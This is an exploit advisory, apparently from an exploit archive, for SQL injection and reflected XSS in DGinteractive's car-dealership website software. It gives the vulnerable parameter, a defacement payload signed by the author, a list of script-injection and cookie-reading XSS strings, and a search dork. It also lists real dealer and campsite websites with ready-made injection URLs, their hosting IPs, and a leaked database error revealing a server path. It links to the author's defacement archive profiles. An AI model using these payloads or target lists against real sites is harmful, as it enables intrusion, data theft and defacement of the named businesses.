#################################################################### # Exploit Title : DGinteractive Internet Automobile XSS SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 21 May 2020 # Vendor Homepage : dginteractive.fr + dginteractive.fr/creation-de-sites-internet/creation-site-internet-mandataire-automobile-concession-garage # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] CAPEC-66 [ SQL Injection ] CAPEC-63 [ Cross-Site Scripting (XSS) ] # Google Dorks : DGinteractive : création de site internet automobile # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/KingSkrupellos # Zone-H : zone-h.org/archive/notifier=KingSkrupellos zone-h.org/archive/notifier=CyBeRiZM # Mirror-H : mirror-h.org/search/hacker/948/ mirror-h.org/search/hacker/94/ mirror-h.org/search/hacker/1826/ # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos defacer.id/archive/team/Cyberizm-Org # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/ # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos aljyyosh.org/hacker.php?id=Cyberizm.Org aljyyosh.org/hacker.php?id=Cyberizm # Zone-D : zone-d.org/attacker/id/69 # Pastebin : pastebin.com/u/KingSkrupellos # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities ################################################################### # Impact : *********** DGinteractive is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool. Reflected XSS (or Non-Persistent) : *************************************** The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') *********************************************************************************** The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ******************************************************************************** The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Cross-site scripting (XSS) vulnerabilities occur when: 1. Untrusted data enters a web application, typically from a web request. 2. The web application dynamically generates a web page that contains this untrusted data. 3. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc. 4. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data. 5. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain. 6. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain. CAPEC-66: SQL Injection ************************ This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. CAPEC-63: Cross-Site Scripting (XSS) ************************************ An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect. ################################################################### # SQL Vulnerable Parameter : ************************** ?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection] # SQL Injection Exploit : ********************** /index.php?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection] # Cross Site Scripting XSS Exploit : ******************************** /index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0 &formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E 1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee> "><script>alert(String.fromCharCode(88,83,83))</script> ">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1 <ScRipT>alert("XSS");</ScRipT> "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> “><ScRiPt>alert(document.cookie)</script> data:text/html,<script>alert(0)</script> <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> <svg onload=alert(1)// <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> "`'><script>\xE2\x80\x84javascript:alert(1)</script> ################################################################### # Example Vulnerable Sites and Vulnerable IP Addresses : *************************************************** Reverse IP results for (213.186.33.2) There are 60,082 domains hosted on this server. Reverse IP results for (164.132.235.17) There are 89,323 domains hosted on this server. Reverse IP results for (213.186.33.19) There are 145,637 domains hosted on this server. Reverse IP results for (87.98.154.146) There are 84,065 domains hosted on this server. Reverse IP results for (213.186.33.107) There are 1,380 domains hosted on this server. Reverse IP results for (213.186.33.16) There are 66,886 domains hosted on this server. Reverse IP results for (217.160.0.58) There are 14,732 domains hosted on this server. Reverse IP results for (213.186.33.4) There are 114,183 domains hosted on this server. Reverse IP results for (164.132.235.17) There are 89,323 domains hosted on this server. Reverse IP results for (217.160.0.116) There are 14,867 domains hosted on this server. Reverse IP results for (213.186.33.40) There are 95,065 domains hosted on this server. Reverse IP results for (213.186.33.3) There are 103,623 domains hosted on this server. Reverse IP results for (81.88.48.95) There are 11,443 domains hosted on this server. Reverse IP results for (213.186.33.16) There are 66,886 domains hosted on this server. [+] milleniumauto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] ie-auto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] adourimport.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] autoimportjls.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] lmda-automobiles.fr//index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] auto-direct-import.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] neuve-occaz-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] milleniumautogalerie.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] garagefillon.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] autoimport72.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] priscar.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] camping-saint-meen.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 [+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27 ################################################################### # Example SQL Database Error : **************************** Erreur recup liste produit You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',16' at line 1 :: SELECT * FROM dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre ASC LIMIT 1',16 Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',16' at line 1' in /home/cuisiniezb /www/inc.resultat.php:11 Stack trace: #0 /home/cuisiniezb/www/inc.resultat.php(11): PDO-> query('SELECT * FROM d...') #1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...') #2 {main} thrown in /home/cuisiniezb/www/inc.resultat.php on line 11 ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################